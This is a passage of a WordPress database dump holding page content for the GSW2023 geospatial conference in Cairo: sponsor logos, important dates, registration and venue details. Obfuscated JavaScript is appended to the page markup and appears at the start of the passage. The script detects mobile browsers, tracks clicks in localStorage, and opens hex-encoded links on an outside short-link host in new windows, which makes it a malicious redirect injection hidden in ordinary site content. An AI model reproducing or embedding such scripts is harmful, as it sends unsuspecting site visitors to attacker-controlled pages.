|\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TUTORIAL','','inherit','closed','closed','','3670-revision-v1','','','2023-05-07 21:06:21','2023-05-07 21:06:21','',3670,'https://gsw2023.com/?p=4330',0,'revision','',0),
(4482,1,'2023-05-16 01:34:04','2023-05-16 01:34:04','','LOGO_CORP_HORIZONTAL_LIGHT','','inherit','open','closed','','logo_corp_horizontal_light','','','2023-05-16 01:34:04','2023-05-16 01:34:04','',3066,'https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT.png',0,'attachment','image/png',0),
(4483,1,'2023-05-16 01:38:36','2023-05-16 01:38:36','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201067395{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Platinum Sponsors</strong></h4>\n<p><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482 size-medium\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"300\" height=\"91\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 